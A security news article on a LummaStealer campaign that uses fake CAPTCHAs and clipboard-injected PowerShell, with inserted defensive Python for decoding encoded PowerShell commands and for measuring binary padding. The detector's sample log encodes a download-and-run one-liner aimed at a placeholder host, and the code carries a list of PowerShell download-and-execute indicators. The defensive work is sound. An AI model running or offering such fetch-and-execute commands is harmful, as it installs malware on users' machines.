LummaStealer Threat Hidden in Fake CAPTCHAs: Silent Installation Alert



Cybersecurity researchers at G DATA have discovered a new malware campaign using fake booking websites to spread LummaStealer malware via fake CAPTCHA prompts. This shift in distribution, found in January 2025, moves the malware away from platforms like GitHub and Telegram to malvertising methods.

The infection starts when users visit a fake payment confirmation page, which redirects them to a counterfeit booking site with a fraudulent CAPTCHA verification.


The attack uses a multi-stage process to avoid detection. An encrypted PHP script injects a Base64-encoded PowerShell command into the user’s clipboard.

When run, the command downloads and executes the LummaStealer payload. This version of LummaStealer is much larger: binary padding, which appends filler data that serves no purpose, inflates the file by up to 350%.
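The delivery step described above leaves a recognisable trace in process-creation telemetry: a PowerShell process started with an encoded command. The following is an added defensive example, not code from the original article or from G DATA, that decodes the `-EncodedCommand` blob (base64 over UTF-16LE, as PowerShell expects) and flags the download-and-run indicators commonly found in such one-liners. The log format, the indicator list and the sample lines are constructed for the example; the `example.invalid` host is a placeholder.

```python
import base64
import binascii
import re

# Indicator substrings that recur in PowerShell download-and-run one-liners.
# Coarse substring matching; tune the list for your environment.
INDICATORS = (
    "invoke-expression", "iex", "invoke-webrequest", "iwr",
    "downloadstring", "net.webclient", "frombase64string", "-w hidden",
)

# Encoded-command switch in any accepted abbreviation, followed by a base64 blob.
# Longest alias first so "-e" does not swallow "-enc".
ENCODED_RE = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand, or None if absent or invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> dict:
    """Classify one process command line taken from a process-creation event."""
    decoded = decode_encoded_command(cmdline)
    # Search both the raw command line (switches such as -w hidden) and the decoded script.
    haystack = cmdline.lower() + " " + (decoded or "").lower()
    hits = [tok for tok in INDICATORS if tok in haystack]
    if hits:
        verdict = "suspicious"
    elif decoded is not None:
        verdict = "encoded-review"   # encoded but no known indicator: worth a look
    else:
        verdict = "benign"
    return {"cmdline": cmdline, "decoded": decoded, "indicators": hits, "verdict": verdict}


def scan_logs(lines):
    """Triage every log line that carries a CommandLine= field (assumed last field)."""
    results = []
    for line in lines:
        if "CommandLine=" not in line:
            continue
        results.append(triage(line.split("CommandLine=", 1)[1]))
    return results


def _encode_ps(script: str) -> str:
    """Used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample lines in a Sysmon/4688-style key=value layout (not real telemetry).
SAMPLE_LOGS = [
    "2025-01-15T10:00:01Z EventID=1 User=CORP\\alice CommandLine=powershell.exe -NoProfile -Command Get-Date",
    "2025-01-15T10:00:07Z EventID=1 User=CORP\\alice CommandLine=powershell.exe -w hidden -enc "
    + _encode_ps("iex (iwr https://example.invalid/verify.txt -UseBasicParsing).Content"),
    "2025-01-15T10:00:09Z EventID=1 User=CORP\\alice CommandLine=explorer.exe",
]

if __name__ == "__main__":
    for r in scan_logs(SAMPLE_LOGS):
        print(r["verdict"], r["indicators"], (r["decoded"] or r["cmdline"])[:60])
```

Running it over the three constructed lines marks only the encoded one as suspicious, with the decoded script and the matched indicators attached so an analyst sees the plain-text command rather than the base64. A sensible follow-up is to correlate the event with its parent process: a PowerShell instance spawned from a browser or from `explorer.exe` after a paste is the shape this clipboard-driven chain produces.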

Figure: Infection Chain Flow

This method bypasses file size limits in security tools, slowing analysis and reducing the effectiveness of signature-based antivirus detection.
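Because the padding is junk appended to an otherwise ordinary payload, a defender can measure it directly rather than relying on the inflated size. The block below is an added example, not from the article or from G DATA, that reports how much of a file is a trailing run of one byte value, the entropy of its tail, and the implied growth factor, and that strips the run so the core can be hashed or scanned at its real size. The samples are constructed byte strings, not real malware, and the thresholds are assumptions to tune.

```python
from collections import Counter
from math import log2


def shannon_entropy(chunk: bytes) -> float:
    """Bits per byte: 0.0 for a single repeated value, 8.0 for a uniform spread."""
    if not chunk:
        return 0.0
    n = len(chunk)
    return -sum((c / n) * log2(c / n) for c in Counter(chunk).values())


def trailing_run(data: bytes):
    """Length and value of the run of identical bytes at the end of the file."""
    if not data:
        return 0, None
    last = data[-1]
    i = len(data)
    while i > 0 and data[i - 1] == last:
        i -= 1
    return len(data) - i, last


def strip_padding(data: bytes) -> bytes:
    """Drop the trailing single-byte run so hashing and scanning see the core only."""
    run, _ = trailing_run(data)
    return data[: len(data) - run] if run > 1 else data


def analyze_padding(data: bytes, tail_window: int = 4096, pad_threshold: float = 0.3) -> dict:
    """Summarise padding evidence for one file image held in memory."""
    size = len(data)
    run, value = trailing_run(data)
    pad_fraction = run / size if size else 0.0
    tail_entropy = shannon_entropy(data[-tail_window:])
    core_size = size - run
    growth_pct = ((size / core_size) - 1.0) * 100.0 if core_size else float("inf")
    # Either a large trailing run or a near-constant tail counts as padding (assumed rule).
    padded = pad_fraction >= pad_threshold or (size >= tail_window and tail_entropy < 1.0)
    return {
        "size": size,
        "pad_bytes": run,
        "pad_value": value,
        "pad_fraction": pad_fraction,
        "tail_entropy": tail_entropy,
        "growth_pct": growth_pct,
        "verdict": "likely padded" if padded else "no padding detected",
    }


# Constructed samples: a 10 KiB "core" with every byte value present, and the same
# core followed by 30 KiB of zeros (75% padding), standing in for a padded binary.
CORE = bytes(range(256)) * 40
PADDED_SAMPLE = CORE + b"\x00" * (3 * len(CORE))
CLEAN_SAMPLE = CORE

if __name__ == "__main__":
    for name, sample in (("padded", PADDED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        r = analyze_padding(sample)
        print(name, r["verdict"], f"{r['pad_fraction']:.0%} padding, +{r['growth_pct']:.0f}% growth")
```

For the constructed padded sample the report shows 75% padding and a 300% growth factor, and `strip_padding` returns the 10 KiB core. In practice the hash of the stripped core is the value worth comparing against known samples, since each padded copy can carry a different full-file hash, and a file whose size only crosses a scanner's limit because of padding should be submitted after stripping rather than skipped.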

Expanding Scope and Advanced Evasion Techniques

The campaign has a global reach, affecting countries like the Philippines and Germany. Over time, the attack’s geographic focus shifted, suggesting a broader targeting strategy. LummaStealer continues using advanced obfuscation techniques like Indirect Control Flow and Dispatcher Blocks, making it harder for researchers to track the malware’s execution.

With new distribution tactics and refined evasion methods, cybersecurity experts predict LummaStealer will remain a significant threat. The threat actors behind it are quick to adapt, using techniques like ClickFix to increase their success rate.

Users should be cautious when interacting with booking sites and watch out for unusual CAPTCHA requests that ask for system-level actions. Keeping security software updated and practicing good digital hygiene are essential for protection against these evolving threats.

About the Author:

FirstHackersNews - Identifies Security
